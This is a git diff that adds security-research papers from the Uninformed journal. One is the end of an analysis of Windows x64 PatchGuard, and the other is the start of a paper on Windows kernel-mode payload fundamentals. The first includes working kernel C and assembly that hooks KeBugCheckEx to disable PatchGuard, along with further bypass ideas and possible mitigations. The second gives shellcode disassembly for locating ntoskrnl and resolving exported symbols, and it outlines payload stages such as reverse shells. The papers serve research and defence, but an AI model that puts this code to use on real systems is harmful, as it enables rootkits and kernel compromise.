OrigKeBugCheckExRestorePointer:PROC +EXTERN KeBugCheckExHookPointer:PROC + +.code + +; +; Points the stack pointer at the supplied argument and returns to the caller. +; +public AdjustStackCallPointer +AdjustStackCallPointer PROC + mov rsp, rcx + xchg r8, rcx + jmp rdx +AdjustStackCallPointer ENDP + +; +; Wraps the overwritten preamble of KeBugCheckEx. +; +public OrigKeBugCheckEx +OrigKeBugCheckEx PROC + mov [rsp+8h], rcx + mov [rsp+10h], rdx + mov [rsp+18h], r8 + lea rax, [OrigKeBugCheckExRestorePointer] + jmp qword ptr [rax] +OrigKeBugCheckEx ENDP + +END + +== antipatch.c + +// +// Both of these routines reference the assembly code described +// above +// +extern VOID OrigKeBugCheckEx( + IN ULONG BugCheckCode, + IN ULONG_PTR BugCheckParameter1, + IN ULONG_PTR BugCheckParameter2, + IN ULONG_PTR BugCheckParameter3, + IN ULONG_PTR BugCheckParameter4); +extern VOID AdjustStackCallPointer( + IN ULONG_PTR NewStackPointer, + IN PVOID StartAddress, + IN PVOID Argument); + +// +// mov eax, ptr +// jmp eax +// +static CHAR HookStub[] = +"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xe0"; + +// +// The offset into the ETHREAD structure that holds the start routine. +// +static ULONG ThreadStartRoutineOffset = 0; + +// +// The pointer into KeBugCheckEx after what has been overwritten by the hook. +// +PVOID OrigKeBugCheckExRestorePointer; + +VOID KeBugCheckExHook( + IN ULONG BugCheckCode, + IN ULONG_PTR BugCheckParameter1, + IN ULONG_PTR BugCheckParameter2, + IN ULONG_PTR BugCheckParameter3, + IN ULONG_PTR BugCheckParameter4) +{ + PUCHAR LockedAddress; + PCHAR ReturnAddress; + PMDL Mdl = NULL; + + + // + // Call the real KeBugCheckEx if this isn't the bug check code we're looking + // for. + // + if (BugCheckCode != 0x109) + { + DebugPrint(("Passing through bug check %.4x to %p.", + BugCheckCode, + OrigKeBugCheckEx)); + + OrigKeBugCheckEx( + BugCheckCode, + BugCheckParameter1, + BugCheckParameter2, + BugCheckParameter3, + BugCheckParameter4); + } + else + { + PCHAR CurrentThread = (PCHAR)PsGetCurrentThread(); + PVOID StartRoutine = *(PVOID **)(CurrentThread + ThreadStartRoutineOffset); + PVOID StackPointer = IoGetInitialStack(); + + DebugPrint(("Restarting the current worker thread %p at %p (SP=%p, off=%lu).", + PsGetCurrentThread(), + StartRoutine, + StackPointer, + ThreadStartRoutineOffset)); + + // + // Shift the stack pointer back to its initial value and call the routine. We + // subtract eight to ensure that the stack is aligned properly as thread + // entry point routines would expect. + // + AdjustStackCallPointer( + (ULONG_PTR)StackPointer - 0x8, + StartRoutine, + NULL); + } + + // + // In either case, we should never get here. + // + __debugbreak(); +} + +VOID DisablePatchProtectionSystemThreadRoutine( + IN PVOID Nothing) +{ + UNICODE_STRING SymbolName; + NTSTATUS Status = STATUS_SUCCESS; + PUCHAR LockedAddress; + PUCHAR CurrentThread = (PUCHAR)PsGetCurrentThread(); + PCHAR KeBugCheckExSymbol; + PMDL Mdl = NULL; + + + RtlInitUnicodeString( + &SymbolName, + L"KeBugCheckEx"); + + do + { + // + // Find the thread's start routine offset. + // + for (ThreadStartRoutineOffset = 0; + ThreadStartRoutineOffset < 0x1000; + ThreadStartRoutineOffset += 4) + { + if (*(PVOID **)(CurrentThread + + ThreadStartRoutineOffset) == (PVOID)DisablePatchProtection2SystemThreadRoutine) + break; + } + + DebugPrint(("Thread start routine offset is 0x%.4x.", + ThreadStartRoutineOffset)); + + // + // If we failed to find the start routine offset for some strange reason, + // then return not supported. + // + if (ThreadStartRoutineOffset >= 0x1000) + { + Status = STATUS_NOT_SUPPORTED; + break; + } + + // + // Get the address of KeBugCheckEx. + // + if (!(KeBugCheckExSymbol = MmGetSystemRoutineAddress( + &SymbolName))) + { + Status = STATUS_PROCEDURE_NOT_FOUND; + break; + } + + // + // Calculate the restoration pointer. + // + OrigKeBugCheckExRestorePointer = (PVOID)(KeBugCheckExSymbol + 0xf); + + // + // Create an initialize the MDL. + // + if (!(Mdl = MmCreateMdl( + NULL, + (PVOID)KeBugCheckExSymbol, + 0xf))) + { + Status = STATUS_INSUFFICIENT_RESOURCES; + break; + } + + MmBuildMdlForNonPagedPool( + Mdl); + + // + // Probe & Lock. + // + if (!(LockedAddress = (PUCHAR)MmMapLockedPages( + Mdl, + KernelMode))) + { + IoFreeMdl( + Mdl); + + Status = STATUS_ACCESS_VIOLATION; + break; + } + + // + // Set the aboslute address to our hook. + // + *(PULONG64)(HookStub + 0x2) = (ULONG64)KeBugCheckExHook; + + DebugPrint(("Copying hook stub to %p from %p (Symbol %p).", + LockedAddress, + HookStub, + KeBugCheckExSymbol)); + + // + // Copy the relative jmp into the hook routine. + // + RtlCopyMemory( + LockedAddress, + HookStub, + 0xf); + + // + // Cleanup the MDL. + // + MmUnmapLockedPages( + LockedAddress, + Mdl); + + IoFreeMdl( + Mdl); + + } while (0); +} + +// +// A pointer to KeBugCheckExHook +// +PVOID KeBugCheckExHookPointer = KeBugCheckExHook; + +NTSTATUS DisablePatchProtection() { + OBJECT_ATTRIBUTES Attributes; + NTSTATUS Status; + HANDLE ThreadHandle = NULL; + + InitializeObjectAttributes( + &Attributes, + NULL, + OBJ_KERNEL_HANDLE, + NULL, + NULL); + + // + // Create the system worker thread so that we can automatically find the + // offset inside the ETHREAD structure to the thread's start routine. + // + Status = PsCreateSystemThread( + &ThreadHandle, + THREAD_ALL_ACCESS, + &Attributes, + NULL, + NULL, + DisablePatchProtectionSystemThreadRoutine, + NULL); + + if (ThreadHandle) + ZwClose( + ThreadHandle); + + return Status; +} + + +This approach has been tested and has been confirmed to work against +the current version of PatchGuard at the time of this writing. The +benefits that this approach has over others is that it does not rely +on any un-exported dependencies or signatures, it has zero +performance overhead since nt!KeBugCheckEx is never called +unless the machine is going to crash, and it is not subject to race +conditions. The only major con that it has that the authors are +aware of is that it depends on the behavior of the system worker +threads staying the same with regard to the fact that it is safe to +restore execution to the entry point of the thread with a +NULL context. It is assumed, so far, that this will +continue to be a safe bet. + +In order to eliminate this approach as a possible bypass technique, +Microsoft could do one of a few things. First, they could create a new +protection sub-context that stores a checksum of nt!KeBugCheckEx and the +functions that it calls. In the event that it is detected that +nt!KeBugCheckEx has been tampered with, PatchGuard could do a hard +reboot without calling any external functions. While this is a less +desired behavior, it appears to be one of the few ways in which +Microsoft could reliably solve this. Any other approach that relied on +the calling of an external function that could be found at a +deterministic address would present an opportunity for a similar bypass +technique. + +A second, less useful approach would be to zero out some of the fields +in the thread structure prior to calling nt!KeBugCheckEx. While this +would prevent the above described approach from working, it would +certainly not prevent another, perhaps more or less hackish approach +from working. All that's required is the ability to return the worker +thread to its normal operation of processing queued work items. + +4.3) Finding the Timer + + +A theoretical approach that has not been tested that could be used to +disable PatchGuard would involve using some heuristic algorithm to +locate the timer context associated with PatchGuard. To develop such an +algorithm, it is necessary to take into account what is known about the +way the timer DPC routine is set up. First, it is known that the +DeferredRoutine associated with the DPC will point to one of +nt!KiScanReadyQueues, nt!ExpTimeRefreshDpcRoutine, or +nt!ExpTimeZoneDpcRoutine. Unfortunately, the addresses associated with +these routines cannot be directly determined since they are not +exported, but regardless, this knowledge could be of use. The second +thing that is known is that the DeferredContext associated with the DPC +will be set to an invalid pointer. It is also known that at offset 0x88 +from the start of the timer structure is the word 0x1131. Given +sufficient research, it is also likely that other contextual references +could be found in relation to the timer that would provide enough data +to deterministically identify the PatchGuard timer. + +However, the problem is finding a way able to enumerate timers in the +first place. In this case, the un-exported address of the timer list +would have to be extracted in order to be able to enumerate all of the +active timers. While there are some indirect methods through which this +information could be extracted, such as by disassembling some functions +that make reference to it, the mere fact of depending on some method of +locating un-exported symbols is something that will likely lead to +unstable code. + +Another option that would not require the location of un-exported +symbols would be to find some mechanism by which the address space can +be searched, starting at nt!MmNonPagedPoolStart, using the heuristic +matching requirements described above. Given the right set of +parameters for the search, it seems likely that it would be possible to +reliably and deterministically locate the timer structure. However, +there is certainly a race condition waiting to happen under this model +given that the timer routine could be dispatched immediately after +locating it but prior to canceling it. To surmount this, the thread +doing the searching would need to raise to a higher IRQL and possibly +disable other processors during the time that it is doing its search. + +Regardless, given the ability to locate the timer structure, it should +be as simple as calling nt!KeCancelTimer to abort the PatchGuard +verification routine and disable it entirely. If possible, such an +approach would be very optimal because it would require no patching of +code. + +If such a technique were to be proven feasible, Microsoft would have to +do one of two things to break it. First, they could identify the +matching criteria being used by drivers and ensure that the assumptions +made are no longer safe, thus making it impossible to locate the timer +structure using the existing set of matching parameters. Alternatively, +Microsoft could change the mechanism by which the PatchGuard +verification routine is executed such that it does not make use of a +timer DPC routine. The latter is most likely less preferable than the +former as it would require a relatively significant redesign and +reconsideration of the techniques used to misdirect and obfuscate the +PatchGuard verification phase. + +4.4) Hybrid Interception + + +Of the techniques listed so far, the approaches taken to disable or +otherwise prevent PatchGuard from operating as normal rely on two basic +points of interception. In the case of the exception handler hooking +approach, PatchGuard is subverted by preventing the actual verification +routines from running. This point of interception can be seen as a +before-the-fact approach. In the case of the nt!KeBugCheckEx hook, +PatchGuard is subverted by preventing the reporting of the error that is +associated with a critical structure modification being detected. This +point of interception can be seen as an after-the-fact approach. A +theoretical approach would be to combine the two concepts in a way that +allows for more deterministic and complete detection of the execution of +PatchGuard's verification routines. + +One possible example of this type of approach would be to generalize the +hooking of the exception handlers that are associated with the timer DPC +routines that PatchGuard uses to the central entry point for C-style +exceptions. This routine is named nt!__C_specific_handler and it is an +exported symbol, making it quite useful if it can be harnessed. By +hooking this routine, information about exceptions could be tracked and +filtered for referencing after-the-fact information, as necessary, to +determine that PatchGuard is running. + +4.5) Simulated Hot Patching + + +The documentation associated with PatchGuard states that it still allows +the operating system to be hot-patched through their runtime patching +API. For this reason, it should be possible to simulate a hot-patch +that would appear to PatchGuard as having been legitimate. At the time +of this writing, the authors have not taken the time to understand the +manner in which this could be accomplished, but it is left open to +further research. Assuming an approach was found that allowed this +technique to work reliably, it stands to reason that doing so would be +the most preferred route because it would be making use of a documented +approach for the circumvention of PatchGuard. + +5) Conclusion + + +The development of a solution that is intended to mitigate the +unauthorized modification of various critical portions of the kernel can +be seen as a rather daunting task, especially when considering the need +to ensure that the routines actually used for the validation of the +kernel cannot be tampered with. This document has shown how Microsoft +has approached the problem with their PatchGuard implementation on +x64-based versions of the Windows kernel. The implementations of the +approaches used to protect the various critical data structures +associated with the kernel, such as system images, SSDT, IDT/GDT, and +MSRs, have been explained in detail. + +With an understanding of the implementation of PatchGuard, it is only +fitting to consider ways it which it might be subverted. In that light, +this paper has proposed a few different techniques that could be used to +bypass PatchGuard that have either been proven to work or are theorized +to work. In the interest of not identifying a problem without also +proposing a solution, each bypass technique has an associated list of +ways in which the technique could be mitigated by Microsoft in the +future. + +Unfortunately, Microsoft is at a disadvantage with PatchGuard, and it's +one that they are perfectly aware of. This disadvantage stems from the +fact that PatchGuard is designed to run from the same protection domain +as the code that it is designed to protect from. In more concise terms, +PatchGuard runs just like any third-party driver, and it runs with the +same set of privileges. Due to this fact, it is impossible to guarantee +that a third-party driver won't be able to do something that will +prevent PatchGuard from being able to do its job since there is no way +for PatchGuard to completely protect itself. Since this problem was +known going into the implementation of PatchGuard, Microsoft chose to +use the only weapons readily available to them: obfuscation and +misdirection. While most consider security through obscurity to be no +security at all in the face of a sufficiently motivated engineer, it +does indeed raise the bar enough that most programmers and third-party +entities would not have the interest in finding a way to bypass it and +instead would be more motivated to find a condoned method of +accomplishing their goals. + +In cases such as this one it is sometimes important to take a step back +and consider if the avenue that has been taken is actually the right +one. In particular, Microsoft has decided to take an aggressive stance +against patching different parts of the kernel in the interest of making +Windows more stable. While this desire seems very reasonable and +logical, it comes at a certain cost. Due to the fact that Windows is a +closed source operating system, third-party software vendors sometimes +find themselves forced to bend the rules in order to accomplish the +goals of their product. This is especially true in the security industry +where security software vendors find themselves having to try to layer +deeper than malicious code. It could be argued that PatchGuard's +implementation will prevent the malicious techniques from being +possible, thus freeing up the security software vendors to more +reasonable points of entry. The fact of the matter is, though, that +while security software vendors may not make use of techniques used to +bypass PatchGuard due to marketing and security concerns, it can +certainly be said that malicious code will. As such, malicious code +actually gains an upper-hand in the competition since security vendors +end up with their hands tied behind their back. In order to address +this concern, Microsoft appears to be willing to work actively with +vendors to ensure that they are still able to accomplish their goals +through more acceptable and documented approaches. + +Another important question to consider is whether or not Microsoft will +really break a vendor that has deployed a solution to millions of +systems that happens to disable PatchGuard through a bypass technique. +One could feasibly see a McAfee or Symantec doing something like this, +although Microsoft would hope to leverage their business ties to ensure +that McAfee and Symantec did not have to resort to such a technique. +The fact that McAfee and Symantec are such large companies lends them a +certain amount of leverage when negotiating with Microsoft, but the +smaller companies are most likely going to not be subject to the same +level of respect and consideration. + +The question remains, though. Is PatchGuard really the right approach? +If one assumes that Microsoft will aggressively ensure that PatchGuard +breaks malicious code and software vendors who attempt to bypass it by +releasing updates in the future that intentionally break the bypass +approaches, which is what has been indicated so far, then it stands to +reason that Microsoft could be heading down a path that leads to the +kernel actually being more unstable due to more extreme measures being +required. Even if Microsoft extends its hand to other companies to +provide ways of hooking into the kernel at various levels, it will most +likely always be the case that there will be a task that a company needs +to accomplish that will not be readily possible without intervention +from Microsoft. Unless Microsoft is willing to provide these companies +with re-distributable code that makes it so third-party drivers will +work on all existing versions of x64, then the point becomes moot. +Compatibility is a key requirement not only for Microsoft, but also for +third-party vendors, and a solution that won't work on all versions of +the x64 kernel is no solution at all for most companies. + +If Microsoft were to go back in time and eliminate PatchGuard, what +other options might be exposed to them that could be used to supplement +the problem at hand? The answer to this question is very subjective, +but the authors believe that one way in which Microsoft could solve +this, at least in part, would be through a better defined and condoned +hooking model (like hooking VxD services in Windows 9x). The majority +of routines hooked by legitimate products are used by vendors to layer +between certain major subsystems, such as between the hardware and the +kernel or between user-mode and the kernel. Since the majority of +stability problems that third-party vendors introduce with runtime +patching have to do with incorrect or unsafe assumptions within their +hook routines, it would behoove Microsoft to provide a defined hooking +model that expressed the limitations and restrictions associated with +each function that can be hooked. While this might seem like a grand +undertaking, the fact of the matter is that it's not. + +By limiting the hooking model to exported routines, Microsoft could make +use of existing documentation that defines the behaviors and limitations +of the documented functions, such as their IRQL and calling +restrictions. While limiting the hooking model to exported functions +does not cover everything, it's at least a start, and the concepts used +to achieve it could be wrapped into an equally useful interface for +commonly undocumented or non-exported routines. The biggest problem with +this approach, however, is that it would appear to limit Microsoft's +control over the direction that the kernel takes, and in some ways it +does. However, it should already be safe to assume that exported +symbols, at least in relation to documented ones, cannot be eliminated +or largely changed after a release as to ensure backward compatibility. +This only serves to bolster the point that a defined hooking model for +documented, exported routines would not only be feasible but also +relatively safe. + +Regardless of what may or may not have been a better approach, +the lack of a time machine makes the end result of the discussion mostly +meaningless. In the end, judging from the amount of work and thought +put into the implementation of PatchGuard, the authors feel comfortable +in saying that Microsoft has done a commendable job. Only time will +tell how effective PatchGuard is, both at a software and business level, +and it will be interesting to see how the field plays out. + + +AMD. The AMD x86-64 Architecture Programmers Overview. +http://www.amd.com/us-en/assets/contenttype/whitepapersandtechdocs/x86-64overview.pdf; +accessed Nov 30, 2005. + + +AMD. AMD64 Architecture Programmer's Manual Volume 3. +http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/24594.pdf; +accessed Dec 1, 2005. + + +Microsoft Corporation. Patching Policy for x64-Based Systems. +http://www.microsoft.com/whdc/driver/kernel/64bitPatching.mspx; +accessed Nov 28, 2005. diff --git a/uninformed/3.2.txt b/uninformed/3.2.txt new file mode 100644 index 0000000..f6b0f43 --- /dev/null +++ b/uninformed/3.2.txt @@ -0,0 +1,1490 @@ +Windows Kernel-mode Payload Fundamentals +bugcheck & skape +Dec 12, 2005 + +1) Foreword + + +Abstract: This paper discusses the theoretical and practical +implementations of kernel-mode payloads on Windows. At the time of this +writing, kernel-mode research is generally regarded as the realm of a +few, but it is hoped that documents such as this one will encourage a +thoughtful progression of the subject matter. To that point, this paper +will describe some of the general techniques and algorithms that may be +useful when implementing kernel-mode payloads. Furthermore, the anatomy +of a kernel-mode payload will be broken down into four distinct units, +known as payload components, and explained in detail. In the end, the +reader should walk away with a concrete understanding of the way in +which kernel-mode payloads operate on Windows. + +Thanks: The authors would like to thank Barnaby Jack and Derek Soeder +from eEye for their great paper on ring 0 payloads. Thanks also go out +to jt, spoonm, vax, and everyone at nologin. + +Disclaimer: The subject matter discussed in this document is presented +in the interest of education. The authors cannot be held responsible +for how the information is used. While the authors have tried to be as +thorough as possible in their analysis, it is possible that they have +made one or more mistakes. If a mistake is observed, please contact one +or both of the authors so that it can be corrected. + +Notes: In most cases, testing was performed on Windows 2000 SP4 and +Windows XP SP0. Compatibility with other operating system versions, +such as XP SP2, was inferred by analyzing structure offsets and +disassemblies. It is theorized that many of the implementations +described in this document are also compatible with Windows 2003 Server +SP0/SP1, but due to lack of a functional 2003 installation, testing +could not be performed. + +2) Introduction + + +The subject of exploiting user-mode vulnerabilities and the payloads +required to take advantage of them is something that has been discussed +at length over the course of the past few years. With this realization +finally starting to set in, security vendors have begun implementing +security products that are designed to prevent the exploitation of +user-mode vulnerabilities through a number of different techniques. +There is a shift afoot, however, and it has to do with attacker focus +being shifted from user-mode vulnerabilities toward the realm of +kernel-mode vulnerabilities. The reasons for this shift are due in part +to the inherent value of a kernel-mode vulnerability and to the +relatively unexplored nature of kernel-mode vulnerabilities, which is +something that most researchers find hard to resist. + +To help aide in the shift from user-mode to kernel-mode, this paper will +explore and extend the topic of kernel-mode payloads on Windows. The +reason that kernel-mode payloads are important is because they are the +method of actually doing something meaningful with a kernel-mode +vulnerability. Without a payload, the ability to control code execution +means nothing more than having the ability to cause a denial of service. +Barnaby Jack and Derek Soeder from eEye have done a great job in kicking +off the public research into this area. + +Just like user-mode payloads on Windows, kernel-mode payloads can be +broken down into general techniques and algorithms that are applicable +to most payloads. These techniques and algorithms will be discussed in +chapter . Furthermore, both user-mode and kernel-mode payloads can be +broken down into a set of payload components that can be combined +together to form a single logical payload. A payload component is +simply defined as an autonomous unit of a payload that has a specific +purpose. For instance, both user-mode and kernel-mode payloads have an +optional component called a stager that can be used to execute a second +logical payload component known as a stage. One major distinction +between kernel-mode and user-mode payloads, however, is that kernel-mode +payloads are burdened with some extra considerations that are not found +in user-mode payloads, and for that reason are broken down into a few +more distinct payload components. These extra components will be +discussed at length in chapter . + +The purpose of this document is to provide the reader with a point of +reference for the major aspects common to most all kernel-mode payloads. +To simplify terminology, kernel-mode payloads will be referred to +throughout the document as R0 payloads, short for ring 0, which +symbolizes the processor ring that kernel-mode operates at on x86. For +the same reason, user-mode payloads will be referred to throughout the +document as R3 payloads, short for ring 3. To fully understand this +paper, the reader should have a basic understanding of Windows +kernel-mode programming. + +In order to limit the scope of this document, the methods that can be +used to achieve code execution through different vulnerability scenarios +will not be discussed at length. The main reason for this is that +general approaches to payload implementation are typically independent +of the vulnerability in which they are used for. However, references to +some of the research in this area can be found in the bibliography for +readers who might be curious. Furthermore, this document will not +expand upon some of the interesting things that can be done in the +context of a kernel-mode payload, such as keyboard sniffing. Instead, +the topic of advanced kernel-mode payloads will be left for future +research. The authors hope that by describing the various elements that +will compose most all kernel-mode payloads, the process involved in +implementing some of the more interesting parts will be made easier. + +With all of the formalities out of the way, the first leap to take is +one regarding an understanding of some of the general techniques that +can be applied to kernel-mode payloads, and it's there that the journey +begins. + +3) General Techniques + + +This chapter will outline some of the techniques and algorithms that are +generally applicable to most kernel-mode payloads. For example, +kernel-mode payloads may find it necessary to resolve certain exported +symbols for use within the payload itself, much the same as user-mode +payloads find it necessary. + +3.1) Finding Ntoskrnl.exe Base Address + + +One of the pre-requisites to nearly all user-mode payloads on Windows is +a stub that is responsible for locating the base address of +kernel32.dll. In kernel-mode, the logical equivalent to kernel32.dll is +ntoskrnl.exe, also known more succinctly as nt. The purpose of nt is to +implement the heart of the kernel itself and to provide the core library +interface to device drivers. For that reason, a lot of the routines +that are exported by nt may be of use to kernel-mode payloads. This +makes locating the base address of nt important because it is what +facilitates the resolving of exported symbols. This section will +describe a few techniques that can be used to locate the base address of +nt. + +One general technique that is taken to find the base address of nt is to +reliably locate a pointer that exists somewhere within the memory +mapping for nt and to scan down toward lower addresses until the MZ +checksum is found. This technique will be referred to as a scandown +technique since it involves scanning downward toward lower addresses. +This is completely synonymous with the mid-delta term used by eEye, but +just clarified to indicate a direction. In the implementations provided +below, each makes use of an optimization to walk down in PAGESIZE +decrements. However, this also adds four bytes to the amount of space +taken up by the stub. If size is a concern, walking down byte-by-byte +as is done in the eEye paper can be a great way to save space. + +Another thing to keep in mind with some of these implementations is that +they may fail if the /3GB boot flag is specified. This is not generally +very common, but it could be something that is encountered in the real +world. + +3.1.1) IDT Scandown + + +---------+----------+ + | Size: | 17 bytes | + | Compat: | All | + | Credit: | eEye | + +---------+----------+ + +The approach for finding the base address of nt discussed in eEye's +paper involved finding the high-order word of an IDT handler that was +set to a symbol somewhere inside nt. After acquiring the symbol address, +the payload simply walked down toward lower addresses in memory +byte-by-byte until it found the MZ checksum. The following disassembly +shows the approach taken to do this: + + +00000000 8B3538F0DFFF mov esi,[0xffdff038] +00000006 AD lodsd +00000007 AD lodsd +00000008 48 dec eax +00000009 81384D5A9000 cmp dword [eax],0x905a4d +0000000F 75F7 jnz 0x8 + + +This approach is perfectly fine, however, it could be prone to error +if the four checksum bytes were found somewhere within nt which did not +actually coincide with its base address. This issue is one that is +present to any scandown technique (referred to as ``mid-deltas'' by +eEye). However, scanning down byte-by-byte can be seen as potentially +more error prone, but this is purely conjecture at this point as the +authors are aware of no specific cases in which it would fail. It may +also fail if the direction flag is not cleared, though the chances of +this happening are minimal. One other limiting factor may be the +presence of the NULL byte in the comparison. It is possible to slightly +improve (depending upon which perspective one is looking at it from) +this approach by scanning downward one page at a time and by eliminating +the need to clear the direction flag It is not possible walk downward in +16-page decrements due to the fact that 16 page alignment is not +guaranteed universally in kernel-mode. This also eliminates the presence +of NULL bytes. However, some of these changes lead to the code being +slightly larger (20 bytes total): + + +00000000 6A38 push byte +0x38 +00000002 5B pop ebx +00000003 648B03 mov eax,[fs:ebx] +00000006 8B4004 mov eax,[eax+0x4] +00000009 662501F0 and ax,0xf001 +0000000D 48 dec eax +0000000E 6681384D5A cmp word [eax],0x5a4d +00000013 75F4 jnz 0x9 + + +3.1.2) KPRCB IdleThread Scandown + + +---------+----------+ + | Size: | 17 bytes | + | Compat: | All | + +---------+----------+ + +The base address of nt can also be found by looking at the IdleThread +attribute of the KPRCB for the current KPCR. As it stands, this +attribute always appears to point to a global variable inside of nt. +Just like the IDT scandown approach, this technique uses the symbol as a +starting point to walk down and find the base address of nt by looking +for the MZ checksum. The following disassembly shows how this is +accomplished: + + +00000000 A12CF1DFFF mov eax,[0xffdff12c] +00000005 662501F0 and ax,0xf001 +00000009 48 dec eax +0000000A 6681384D5A cmp word [eax],0x5a4d +0000000F 75F4 jnz 0x5 + + +This approach will fail if it happens that the IdleThread attribute does +not point somewhere within nt, but thus far a scenario such as this has +not been observed. It would also fail if the Kprcb attribute was not +found immediately after the Kpcr, but this has not been observed in +testing. + +3.1.3) SYSENTER_EIP_MSR Scandown + + + +---------+------------------------------------+ + | Size: | 19 bytes | + | Compat: | XP, 2003 (modern processors only) | + +---------+------------------------------------+ + +For processors that support the system call MSR 0x176 +(SYSENTER_EIP_MSR), the base address of nt can be found by reading the +registered system call handler and then using the scandown technique to +find the base address. The following disassembly illustrates how this +can be accomplished: + + +00000000 6A76 push byte +0x76 +00000002 59 pop ecx +00000003 FEC5 inc ch +00000005 0F32 rdmsr +00000007 662501F0 and ax,0xf001 +0000000B 48 dec eax +0000000C 6681384D5A cmp word [eax],0x5a4d +00000011 75F4 jnz 0x7 + + +3.1.4) Known Portable Base Scandown + + +---------+--------------------+ + | Size: | 17 bytes | + | Compat: | 2000, XP, 2003 SP0 | + +---------+--------------------+ + +A quick sampling of base addresses across different major releases show +that the base address of nt is always within a certain range. The one +exception to this in the polling was Windows 2003 Server SP1, and for +that reason this payload is not compatible. The basic idea is to simply +use an offset that is known to reside within the region that nt will be +mapped at on different operating system versions. The table below +describes the mapping ranges for nt on a few different samplings: + + + +------------------+--------------+-------------+ + | Platform | Base Address | End Address | + +------------------+--------------+-------------+ + | Windows 2000 SP4 | 0x80400000 | 0x805a3a00 | + | Windows XP SP0 | 0x804d0000 | 0x806b3f00 | + | Windows XP SP2 | 0x804d7000 | 0x806eb780 | + | Windows 2003 SP1 | 0x80800000 | 0x80a6b000 | + +------------------+--------------+-------------+ + + +As can be seen from the table, the address 0x8050babe resides within +every region that nt could be mapped at except for Windows 2003 Server +SP1. The payload below implements this approach: + + +00000000 B8BEBA5080 mov eax,0x8050babe +00000005 662501F0 and ax,0xf001 +00000009 48 dec eax +0000000A 6681384D5A cmp word [eax],0x5a4d +0000000F 75F4 jnz 0x5 + + +3.2) Resolving Symbols + + +---------+----------+ + | Size: | 67 bytes | + | Compat: | All | + +---------+----------+ + + +Another aspect common to almost all payloads on Windows is the use of +code that walks the export directory of an image to resolve the address +of a symbol The technique of walking the export directory to resolve +symbols has been used for ages, so don't take the example here to be the +first ever use of it. In the kernel, things aren't much different. +Barnaby refers to the use of a two-byte XOR/ROR hash in the eEye paper. +Alternatively, a four byte hash could be used, but as pointed out in the +eEye paper, this leads to a waste of space when two-byte hash could +suffice equally well provided there are no collisions. + +The approach implemented below involves passing a two-byte hash in the +ebx register (the high order bytes do not matter) and the base address +of the image to resolve against in the ebp register. In order to save +space, the code below is designed in such a way that it will transfer +execution into the function after it resolves it, thus making it +possible to resolve and call the function in one step without having to +cache addresses. In most cases, this leads to a size efficiency +increase. + + +00000000 60 pusha +00000001 31C9 xor ecx,ecx +00000003 8B7D3C mov edi,[ebp+0x3c] +00000006 8B7C3D78 mov edi,[ebp+edi+0x78] +0000000A 01EF add edi,ebp +0000000C 8B5720 mov edx,[edi+0x20] +0000000F 01EA add edx,ebp +00000011 8B348A mov esi,[edx+ecx*4] +00000014 01EE add esi,ebp +00000016 31C0 xor eax,eax +00000018 99 cdq +00000019 AC lodsb +0000001A C1CA0D ror edx,0xd +0000001D 01C2 add edx,eax +0000001F 84C0 test al,al +00000021 75F6 jnz 0x19 +00000023 41 inc ecx +00000024 6639DA cmp dx,bx +00000027 75E3 jnz 0xc +00000029 49 dec ecx +0000002A 8B5F24 mov ebx,[edi+0x24] +0000002D 01EB add ebx,ebp +0000002F 668B0C4B mov cx,[ebx+ecx*2] +00000033 8B5F1C mov ebx,[edi+0x1c] +00000036 01EB add ebx,ebp +00000038 8B048B mov eax,[ebx+ecx*4] +0000003B 01E8 add eax,ebp +0000003D 8944241C mov [esp+0x1c],eax +00000041 61 popa +00000042 FFE0 jmp eax + + +To understand how this function works, take for example the resolution +of nt!ExAllocatePool. First, a hash of the string ``ExAllocatePool'' +must be obtained using the same algorithm that the payload uses. For +this payload, the result is 0x0311b83f This was calculated by doing perl +-Ilib -MPex::Utils -e "printf .8x, +Pex::Utils::Ror(Pex::Utils::RorHash("ExAllocatePool"), 13);". Since the +implementation uses a two-byte hash, only 0xb83f is needed. This hash is +then stored in the bx register. Since ExAllocatePool is found within +nt, the base address of nt must be passed in the ebp register. Finally, +in order to perform the resolution, the arguments to nt!ExAllocatePool +must be pushed onto the stack prior to calling the resolution routine. +This is because the resolution routine will transfer control into +nt!ExAllocatePool after the resolution succeeds and therefore must have +the proper arguments on the stack. + +One downside to this implementation is that it won't support the +resolution of data exports (since it tries to jump into them). However, +for such a purpose, the routine could be modified to simply not issue +the jmp instruction and instead rely on the caller to execute it. It is +also important for payloads that use this resolution technique to clear +the direction flag with cld. + +4) Payload Components + + +This chapter will outline four distinct components that can be used in +conjunction with one another to produce a logical kernel-mode payload. +Unlike user-mode vulnerabilities, kernel-mode vulnerabilities tend to be +a bit more involved when it comes to considerations that must be made +when attempting to execute code after successfully exploiting a target. +These concerns include things like IRQL considerations, setting up code +for execution, gracefully continuing execution, and what action to +actually perform. Some of these steps have parallels to user-mode +payloads, but others do not. + +The first consideration that must be made when implementing a +kernel-mode payload is whether or not the IRQL that the payload will be +running at is a concern. For instance, if the payload will be making +use of functions that require the processor to be running at +PASSIVE_LEVEL, then it may be necessary to ensure that the processor is +transitioned to a safe IRQL. This consideration is also dependent on +the vulnerability in question as to whether or not the IRQL will even be +a problem. For scenarios where it is a problem, a migration payload +component can be used to ensure that the code that requires a specific +IRQL is executed in a safe manner. + +The second consideration involves staging either a R3 payload (or +secondary R0 payload) to another location for execution. This payload +component is encapsulated by a stager which has parallels to payload +stagers found in typical user-mode payloads. Unlike user-mode payloads, +though, kernel-mode stagers are typically designed to execute code in +another context, such as in a user-mode process or in another +kernel-mode thread context. As such, stagers may sometimes overlap with +the purpose of the migration component, such as when the act of staging +leads to the stage executing at a safe IRQL, and can therefore be +considered a superset of a migration component in that case. + +The third consideration has to do with how the payload gracefully +restores execution after it has completed. This portion of a +kernel-mode payload is classified as the recovery component. In short, +the recovery component of a payload finds a way to make sure that the +kernel does not crash or otherwise become unusable. If the kernel were +to crash, any code that the payload had intended to execute may not +actually get a chance to run depending on how the payload is structured. +As such, recovery is one of the most volatile and critical aspects of a +kernel-mode payload. + +Finally, and most importantly, the fourth component of a kernel-mode +payload is the stage component. It is this component that actually +performs the real work of the payload. For instance, a stage component +might detect that it's running in the context of lsass.exe and create a +reverse shell in user-mode. As another example of a stage component, +eEye demonstrated a keyboard hook that sent keystrokes back in ICMP echo +responses from the host. Stages have a very broad definition. + +The following sections will explain each one of the four payload +components in detail and offer techniques and implementations that can +be used under certain situations. + +4.1) Migration + + +One of the things that is different about kernel-mode vulnerabilities in +relation to user-mode vulnerabilities is that the Windows kernel +operates internally at specific Interrupt 